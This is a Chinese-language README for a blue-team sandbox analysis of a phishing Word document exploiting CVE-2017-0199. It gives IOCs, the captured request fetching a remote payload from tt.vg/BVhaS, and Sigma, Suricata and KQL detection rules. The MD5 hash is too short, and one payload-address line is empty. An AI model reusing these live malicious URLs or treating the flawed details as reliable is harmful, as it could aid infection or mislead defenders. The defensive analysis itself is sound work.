
RCE-CVE-2017-0199-detection-analysis — 已更新!
本仓库包含对一个利用 CVE-2017-0199 的真实恶意 DOCX 文件的完整蓝队恶意软件分析。该实验环境涵盖沙箱执行、网络取证、IOC 提取、MITRE ATT&CK 映射、释放文件审查及检测规则。证据截图已包含在 evidence 文件夹中,用于专业文档记录。
🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – 完整蓝队沙箱分析
高级恶意软件引爆 • 漏洞利用行为 • IOCs • 检测工程
🎯 1. 执行摘要
本仓库记录了一个**真实的恶意 DOCX** 文件,该文件利用了 **CVE-2017-0199** Microsoft Office RCE 漏洞。 该样本在 **Windows 10 ANY.RUN 沙箱** 内被引爆,暴露了以下内容:
✔ 完整的漏洞利用链
✔ 对恶意域名(tt.vg)的网络回调
✔ 释放的文件与临时产物
✔ JA3 指纹
✔ 注册表活动
✔ 来自 WINWORD.EXE 的 HTTP/HTTPS 信标通信
✔ 完整的蓝队 IOCs 与检测规则
🔍 2. 场景背景
一个名为 “BankPaymAdviceVend.Report.docx” 的文档通过钓鱼邮件被接收。
一旦引爆,ANY.RUN 立即将其标记为恶意,并将其关联到:
- CVE-2017-0199 Word RCE 漏洞利用
- WINWORD.EXE 建立隐蔽的 HTTP/HTTPS 连接
- 联系恶意短域名
tt.vg - 尝试获取远程载荷
/BVhaS
📄 3. 样本信息
| 字段 | 值 |
|---|---|
| 文件 | BankPaymAdviceVend.Report.docx |
| 判定 | 恶意活动 |
| 标签 | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| 沙箱 | Windows 10 Pro x64 |
| 行为 | 漏洞利用 → 网络信标通信 → 释放文件 |
🧬 4. 攻击链(高层示意图)
[ 恶意 DOCX ] │ ▼ [ 用户在 Word 中打开 ] │ ▼ [ CVE-2017-0199 漏洞利用触发 ] │ ▼ [ WINWORD.EXE → 通过 HTTP/HTTPS 访问 tt.vg ] │ ▼ [ 远程路径: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ 释放临时文件、EMF 对象与缓存文件 ] │ ▼ [ 潜在的下一阶段载荷 — 服务器返回 404 ]
yaml 复制代码
🌐 5. 网络行为
5.1 DNS 请求
只有一个域名是恶意的:
| 域名 | 信誉 |
|---|---|
| tt.vg | 🔴 恶意 |
解析出的 IP:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml 复制代码
📡 5.2 HTTP/HTTPS 信标通信
Word 尝试获取:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof
yaml 复制代码
典型的捕获请求:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino 复制代码
服务器响应:
HTTP/1.1 404 Not Found
yaml 复制代码
📁 6. 释放的文件
值得注意的产物
- 多个
.tmp文件 - Office
.glox图形对象 - 浏览器缓存中的 EMF 图像:
%LOCALAPPDATA%\INetCache\Content.MSO\*.emf - 最近文档快捷方式
.LNK index.dat日志- Office 校对词典的更改
🔐 7. 注册表与系统行为
Word 访问了:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml 复制代码
✔ 对 Office 而言属于正常
❌ 与漏洞利用结合 = 明确的恶意行为
💣 8. 漏洞利用剖析 — CVE-2017-0199
类型: 远程代码执行
触发方式: 恶意 DOCX 在无需用户交互的情况下加载远程 HTA
影响版本: Microsoft Word 2007–2016
影响: 攻击者可以执行任意代码
该样本尝试从以下地址加载远程载荷:
yaml 复制代码
🧩 9. IOCs
🔥 9.1 网络指标
域名: tt.vg
URL: http://tt.vg/BVhaS https://tt.vg/BVhaS
IP: 188.114.96.3 188.114.97.3 172.67.138.42
shell 复制代码
🔐 9.2 JA3 SSL 指纹
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml 复制代码
🔍 10. 检测思路 (Sigma / Suricata / EDR)
本节将 BankPaymAdviceVend.Report.docx 的技术分析转化为 SOC 或 蓝队 可以立即部署的实用、可投入生产的检测产物,包含 Sigma 规则、Suricata IDS 签名和 EDR 狩猎查询。
🧾 10.1 Sigma 规则 — WINWORD → tt.vg
该 Sigma 规则可检测 Windows 网络日志中任何由 WINWORD.EXE 发起、指向可疑短域名 tt.vg 的网络连接。
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 任何过时的 Office 系统若通过 WINWORD.EXE 联系 tt.vg,应立即触发调查。
🌐 10.2 Suricata 规则 — HTTP GET /BVhaS 至 tt.vg
一条 Suricata IDS 规则,用于识别源自 Office 的对恶意域名 tt.vg 上 GET /BVhaS 的请求。
这可以捕获漏洞利用尝试获取载荷的行为。
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 在使用 Suricata 或 Zeek 监控出站流量的环境中非常有效。
🛰️ 10.3 EDR 狩猎查询 — WINWORD + tt.vg 指标
一条 KQL(Microsoft Defender)狩猎查询,用于识别环境中任何表现出对 tt.vg 或其关联 IP 地址进行类似恶意信标通信的机器。
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 目的:将单一的沙箱引爆扩展为全企业范围的狩猎。
🧩 11. 本实验所展示的内容
本实验展示了您端到端分析真实世界 钓鱼 DOCX 样本的能力,遵循完整的 SOC 级方法论:
- 理解 CVE-2017-0199 如何在 Microsoft Word 中被触发。
- 追踪
WINWORD.EXE如何成为一个意外的 HTTP/S 客户端。 - 提取 网络 IOCs(域名、URL、IP、JA3 TLS 哈希)。
- 分析 释放的文件、最近的快捷方式和注册表访问以获取取证价值。
- 将所有发现转化为 Sigma、Suricata 和 EDR 狩猎查询。
换句话说——本实验不止步于引爆,而是像专业的 SOC 分析师一样提取真实、可操作的检测情报。
设计并撰写:Ahmed Tarek — 蓝队